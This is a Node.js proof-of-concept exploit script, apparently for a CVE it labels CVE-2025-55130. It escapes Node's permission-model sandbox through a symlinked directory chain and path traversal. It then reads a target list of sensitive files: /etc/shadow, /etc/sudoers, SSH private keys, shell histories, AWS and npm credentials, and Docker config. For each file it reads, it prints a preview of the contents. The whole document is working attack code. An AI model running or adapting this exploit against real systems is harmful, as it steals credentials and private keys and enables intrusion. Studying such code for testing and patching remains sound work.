/*
 * CVE-2025-55130 - Mass File Exfiltration
 * 
 * Dump multiple sensitive files via symlink sandbox escape
 * 
 * Run: node --permission --allow-fs-read=. --allow-fs-write=. exfil.js
 */

const fs = require('fs');
const os = require('os');

const HOME = os.homedir();

// Target list - common sensitive files on Linux
const TARGETS = [
    '/etc/passwd',
    '/etc/shadow',
    '/etc/hosts',
    '/etc/hostname',
    '/etc/os-release',
    '/etc/ssh/sshd_config',
    '/etc/crontab',
    '/etc/sudoers',
    '/proc/version',
    HOME + '/.ssh/id_rsa',
    HOME + '/.ssh/id_ed25519', 
    HOME + '/.ssh/authorized_keys',
    HOME + '/.bash_history',
    HOME + '/.zsh_history',
    HOME + '/.gitconfig',
    HOME + '/.npmrc',
    HOME + '/.aws/credentials',
    HOME + '/.docker/config.json'
];

const CHAIN = './exfil_chain/a/b/c/d/e/f';

console.log(`
 ===============================================
  CVE-2025-55130 // Mass Exfiltration
 ===============================================
  targets: ${TARGETS.length} files
  node:    ${process.version}
 ===============================================
`);

if (typeof process.permission === 'undefined') {
    console.log('[!] permission model not active');
    process.exit(1);
}

// Setup
try {
    fs.rmSync('./exfil_chain', { recursive: true, force: true });
} catch(e) {}

fs.mkdirSync(CHAIN, { recursive: true });
fs.symlinkSync(__dirname, CHAIN + '/link');

const depth = __dirname.split('/').filter(Boolean).length;
const traversal = '../'.repeat(depth);

// Exfil function
function exfil(target) {
    const payload = `${CHAIN}/link/${traversal}${target.replace(/^\//, '')}`;
    try {
        return fs.readFileSync(payload, 'utf8');
    } catch(e) {
        return null;
    }
}

// Run exfil
console.log('[*] starting exfiltration...\n');

let success = 0;
let failed = 0;
const results = {};

TARGETS.forEach(target => {
    process.stdout.write(`[*] ${target} ... `);
    const data = exfil(target);
    
    if (data !== null) {
        results[target] = {
            size: data.length,
            lines: data.split('\n').length,
            preview: data.substring(0, 80).replace(/\n/g, '\\n')
        };
        console.log(`OK (${data.length} bytes)`);
        success++;
    } else {
        console.log('FAILED');
        failed++;
    }
});

// Report
console.log(`
 ===============================================
  EXFIL REPORT
 ===============================================
  success: ${success}
  failed:  ${failed}
 ===============================================
`);

if (success > 0) {
    console.log('[+] VULNERABLE - data extracted:\n');
    
    Object.entries(results).forEach(([file, info]) => {
        console.log(`  ${file}`);
        console.log(`    size: ${info.size} bytes | lines: ${info.lines}`);
        console.log(`    preview: ${info.preview}...`);
        console.log('');
    });
}

// Cleanup
fs.rmSync('./exfil_chain', { recursive: true, force: true });
